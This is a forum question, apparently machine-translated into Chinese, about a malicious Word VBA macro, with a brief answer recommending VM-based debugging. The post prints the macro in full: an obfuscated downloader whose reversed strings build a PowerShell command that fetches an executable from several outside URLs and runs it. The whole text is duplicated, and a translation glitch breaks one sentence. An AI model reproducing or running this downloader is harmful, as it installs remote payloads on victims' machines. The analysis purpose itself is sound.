VBA 恶意代码试图做什么?
What is this VBA malware code trying to do?
我的另一半在 MS word VBA 中收到了一段恶意软件。文档被打开,编辑被启用,木马不知为何被杀毒软件漏掉了。
我 99% 确定系统已清理并且没有持久影响,但是我想了解代码试图做什么,这样我可以 100% 确定。
我设法翻译的内容超出了我的能力范围。
这是VBA的原始函数:
Function BfXNd()
Dim nORTSq(3)
nORTSq(0) = Right(LCsbFFjF, 428)
nORTSq(1) = Left(JErht, 810)
nORTSq(2) = Mid(pjzflRs, 58, 796)
Dim rnMCEl(3)
rnMCEl(0) = Left(JErht, 810)
rnMCEl(1) = Mid(pjzflRs, 58, 796)
rnMCEl(2) = MidB(iOGKfiB, 537, 348)
Dim HXiIk(2)
HXiIk(0) = Left(JErht, 810)
HXiIk(1) = Mid(pjzflRs, 58, 796)
kRRCNwn = Chr(Format(7 + 7 + 1 + 16 + 68)) + "md /V:O/" + Chr(Format(4 + 4 + 1 + 11 + 47)) + Chr(Format(2 + 2 + 0 + 5 + 25)) + "s^e^t e^" + "4= ^ ^ ^ " + " ^ ^ ^ ^ ^ ^}^}^" + "{^h" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^t^a" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^};^ka^" + "er^b;Bv^M$ ^met^I^-^e^k^" + "ovn^I^;)BvM^$^ ,iE^S^$(^e^li" + "^Fd^a^oln^w^oD.^W^W^Y${^y" + "r^t^{)" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "R" + "^w$ ni^ i^ES$(h" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "aer^o^f" + "^;^'ex^e.'^+o^bV$+'^\'+" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^i" + "lbup:vne^$=^BvM^$;'68^9'^ =^ ^"
Dim WlsRmu(5)
WlsRmu(0) = MidB(iOGKfiB, 537, 348)
WlsRmu(1) = MidB(iOGKfiB, 537, 348)
WlsRmu(2) = Right(LCsbFFjF, 428)
WlsRmu(3) = Right(LCsbFFjF, 428)
WlsRmu(4) = Left(JErht, 810)
Dim ojijX(2)
ojijX(0) = MidB(iOGKfiB, 537, 348)
ojijX(1) = MidB(iOGKfiB, 537, 348)
Dim nHDNir(2)
nHDNir(0) = Mid(pjzflRs, 58, 796)
nHDNir(1) = Right(LCsbFFjF, 428)
jhcbfQ = "o^bV$;)'^@'(t^i^lpS.^'lk^U4^um" + "j4S/s^e^.ynnadrm//:" + "^p^tt^h^@JEVk5^m" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^W" + "/r^b.^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".no" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^e" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "i^pa//:^p^tt^h@^A^i1i^U" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^d^" + "I^Q/^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^.^sn" + "o^it^u^lo^s-ah" + "sna^d//:^ptt^h@bu^A"
Dim tmiOA(5)
tmiOA(0) = MidB(iOGKfiB, 537, 348)
tmiOA(1) = Left(JErht, 810)
tmiOA(2) = Left(JErht, 810)
tmiOA(3) = Mid(pjzflRs, 58, 796)
tmiOA(4) = Mid(pjzflRs, 58, 796)
pHiJQ = "^q^HHT^M/m" + "o" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".^i^lam^p^us^ten//:^p^tth@z^" + "O^SdrnmX/^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".no^is^sa^" + "pmo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "ht" + "i^a^f//:^p^t^th'^=" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "Rw^$;t" + "n^ei^l" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "^b^e^W^.teN" + " t" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^e^jbo^-^wen=W^W" + "^Y$ lle^hsr^e^wo^p&&^f^or" + " /^L %^t ^in (^374;^-^1^;0)d^o" + " ^s^e^t ^qhL=!^qhL!!e^4:~%^t,"
Dim isfqZj(5)
isfqZj(0) = Left(JErht, 810)
isfqZj(1) = MidB(iOGKfiB, 537, 348)
isfqZj(2) = Mid(pjzflRs, 58, 796)
isfqZj(3) = MidB(iOGKfiB, 537, 348)
isfqZj(4) = Right(LCsbFFjF, 428)
Dim HCOVDH(2)
HCOVDH(0) = MidB(iOGKfiB, 537, 348)
HCOVDH(1) = Left(JErht, 810)
Dim YuAhz(5)
YuAhz(0) = Left(JErht, 810)
YuAhz(1) = Mid(pjzflRs, 58, 796)
YuAhz(2) = Right(LCsbFFjF, 428)
YuAhz(3) = Mid(pjzflRs, 58, 796)
YuAhz(4) = Mid(pjzflRs, 58, 796)
vflzlZjAjXX = "1!&&^i^f" + " %^t ^ls^s ^1 " + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^al^l " + "%^qhL:^~^5%" + Chr(Format(2 + 2 + 0 + 5 + 25)) + ""
BfXNd = kRRCNwn + jhcbfQ + pHiJQ + vflzlZjAjXX
Dim kmYzM(4)
kmYzM(0) = MidB(iOGKfiB, 537, 348)
kmYzM(1) = Mid(pjzflRs, 58, 796)
kmYzM(2) = Left(JErht, 810)
kmYzM(3) = Mid(pjzflRs, 58, 796)
Dim hNkzi(5)
hNkzi(0) = Mid(pjzflRs, 58, 796)
hNkzi(1) = Left(JErht, 810)
hNkzi(2) = Left(JErht, 810)
hNkzi(3) = Mid(pjzflRs, 58, 796)
hNkzi(4) = MidB(iOGKfiB, 537, 348)
End Function
这是加密代码。
如果不运行将其设置得足够远以使其自行解密,就无法判断它在做什么。
当 运行 时,字符串将被转换回某种命令,此时您可以知道它要做什么。
如果您想检查它,启动一个 windows 虚拟机 (you can get them free from Microsoft),安装 Word,您可以使用 [=19] 中的调试器单步执行代码=] Word 中的菜单。
我的另一半在 MS word VBA 中收到了一段恶意软件。文档被打开,编辑被启用,木马不知为何被杀毒软件漏掉了。
我 99% 确定系统已清理并且没有持久影响,但是我想了解代码试图做什么,这样我可以 100% 确定。
我设法翻译的内容超出了我的能力范围。
这是VBA的原始函数:
Function BfXNd()
Dim nORTSq(3)
nORTSq(0) = Right(LCsbFFjF, 428)
nORTSq(1) = Left(JErht, 810)
nORTSq(2) = Mid(pjzflRs, 58, 796)
Dim rnMCEl(3)
rnMCEl(0) = Left(JErht, 810)
rnMCEl(1) = Mid(pjzflRs, 58, 796)
rnMCEl(2) = MidB(iOGKfiB, 537, 348)
Dim HXiIk(2)
HXiIk(0) = Left(JErht, 810)
HXiIk(1) = Mid(pjzflRs, 58, 796)
kRRCNwn = Chr(Format(7 + 7 + 1 + 16 + 68)) + "md /V:O/" + Chr(Format(4 + 4 + 1 + 11 + 47)) + Chr(Format(2 + 2 + 0 + 5 + 25)) + "s^e^t e^" + "4= ^ ^ ^ " + " ^ ^ ^ ^ ^ ^}^}^" + "{^h" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^t^a" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^};^ka^" + "er^b;Bv^M$ ^met^I^-^e^k^" + "ovn^I^;)BvM^$^ ,iE^S^$(^e^li" + "^Fd^a^oln^w^oD.^W^W^Y${^y" + "r^t^{)" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "R" + "^w$ ni^ i^ES$(h" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "aer^o^f" + "^;^'ex^e.'^+o^bV$+'^\'+" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^i" + "lbup:vne^$=^BvM^$;'68^9'^ =^ ^"
Dim WlsRmu(5)
WlsRmu(0) = MidB(iOGKfiB, 537, 348)
WlsRmu(1) = MidB(iOGKfiB, 537, 348)
WlsRmu(2) = Right(LCsbFFjF, 428)
WlsRmu(3) = Right(LCsbFFjF, 428)
WlsRmu(4) = Left(JErht, 810)
Dim ojijX(2)
ojijX(0) = MidB(iOGKfiB, 537, 348)
ojijX(1) = MidB(iOGKfiB, 537, 348)
Dim nHDNir(2)
nHDNir(0) = Mid(pjzflRs, 58, 796)
nHDNir(1) = Right(LCsbFFjF, 428)
jhcbfQ = "o^bV$;)'^@'(t^i^lpS.^'lk^U4^um" + "j4S/s^e^.ynnadrm//:" + "^p^tt^h^@JEVk5^m" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^W" + "/r^b.^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".no" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^e" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "i^pa//:^p^tt^h@^A^i1i^U" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^d^" + "I^Q/^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^.^sn" + "o^it^u^lo^s-ah" + "sna^d//:^ptt^h@bu^A"
Dim tmiOA(5)
tmiOA(0) = MidB(iOGKfiB, 537, 348)
tmiOA(1) = Left(JErht, 810)
tmiOA(2) = Left(JErht, 810)
tmiOA(3) = Mid(pjzflRs, 58, 796)
tmiOA(4) = Mid(pjzflRs, 58, 796)
pHiJQ = "^q^HHT^M/m" + "o" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".^i^lam^p^us^ten//:^p^tth@z^" + "O^SdrnmX/^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".no^is^sa^" + "pmo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "ht" + "i^a^f//:^p^t^th'^=" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "Rw^$;t" + "n^ei^l" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "^b^e^W^.teN" + " t" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^e^jbo^-^wen=W^W" + "^Y$ lle^hsr^e^wo^p&&^f^or" + " /^L %^t ^in (^374;^-^1^;0)d^o" + " ^s^e^t ^qhL=!^qhL!!e^4:~%^t,"
Dim isfqZj(5)
isfqZj(0) = Left(JErht, 810)
isfqZj(1) = MidB(iOGKfiB, 537, 348)
isfqZj(2) = Mid(pjzflRs, 58, 796)
isfqZj(3) = MidB(iOGKfiB, 537, 348)
isfqZj(4) = Right(LCsbFFjF, 428)
Dim HCOVDH(2)
HCOVDH(0) = MidB(iOGKfiB, 537, 348)
HCOVDH(1) = Left(JErht, 810)
Dim YuAhz(5)
YuAhz(0) = Left(JErht, 810)
YuAhz(1) = Mid(pjzflRs, 58, 796)
YuAhz(2) = Right(LCsbFFjF, 428)
YuAhz(3) = Mid(pjzflRs, 58, 796)
YuAhz(4) = Mid(pjzflRs, 58, 796)
vflzlZjAjXX = "1!&&^i^f" + " %^t ^ls^s ^1 " + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^al^l " + "%^qhL:^~^5%" + Chr(Format(2 + 2 + 0 + 5 + 25)) + ""
BfXNd = kRRCNwn + jhcbfQ + pHiJQ + vflzlZjAjXX
Dim kmYzM(4)
kmYzM(0) = MidB(iOGKfiB, 537, 348)
kmYzM(1) = Mid(pjzflRs, 58, 796)
kmYzM(2) = Left(JErht, 810)
kmYzM(3) = Mid(pjzflRs, 58, 796)
Dim hNkzi(5)
hNkzi(0) = Mid(pjzflRs, 58, 796)
hNkzi(1) = Left(JErht, 810)
hNkzi(2) = Left(JErht, 810)
hNkzi(3) = Mid(pjzflRs, 58, 796)
hNkzi(4) = MidB(iOGKfiB, 537, 348)
End Function
这是加密代码。
如果不运行将其设置得足够远以使其自行解密,就无法判断它在做什么。
当 运行 时,字符串将被转换回某种命令,此时您可以知道它要做什么。
如果您想检查它,启动一个 windows 虚拟机 (you can get them free from Microsoft),安装 Word,您可以使用 [=19] 中的调试器单步执行代码=] Word 中的菜单。